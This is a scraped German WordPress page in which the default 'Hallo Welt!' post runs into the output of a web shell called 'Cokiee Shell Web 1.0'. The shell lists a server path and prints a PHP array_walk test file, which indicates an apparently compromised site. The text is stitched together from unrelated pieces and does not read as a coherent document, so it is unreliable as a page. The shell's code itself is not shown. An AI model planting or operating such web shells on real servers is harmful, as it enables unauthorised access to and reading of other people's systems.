Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/array/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/array/array_walk_variation8.phpt |
--TEST-- Test array_walk() function : usage variations - buit-in function as callback --FILE-- <?php /* Prototype : bool array_walk(array $input, string $funcname [, mixed $userdata]) * Description: Apply a user function to every member of an array * Source code: ext/standard/array.c */ /* * Passing different buit-in functionns as callback function * pow function * min function * echo language construct */ echo "*** Testing array_walk() : built-in function as callback ***\n"; $input = array(2 => 1, 65, 98, 100, 6 => -4); echo "-- With 'pow' built-in function --\n"; var_dump( array_walk($input, 'pow')); echo "-- With 'min' built-in function --\n"; var_dump( array_walk($input, "min")); echo "-- With 'echo' language construct --\n"; var_dump( array_walk($input, "echo")); echo "Done" ?> --EXPECTF-- *** Testing array_walk() : built-in function as callback *** -- With 'pow' built-in function -- bool(true) -- With 'min' built-in function -- bool(true) -- With 'echo' language construct -- Warning: array_walk() expects parameter 2 to be a valid callback, function 'echo' not found or invalid function name in %s on line %d NULL Done
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare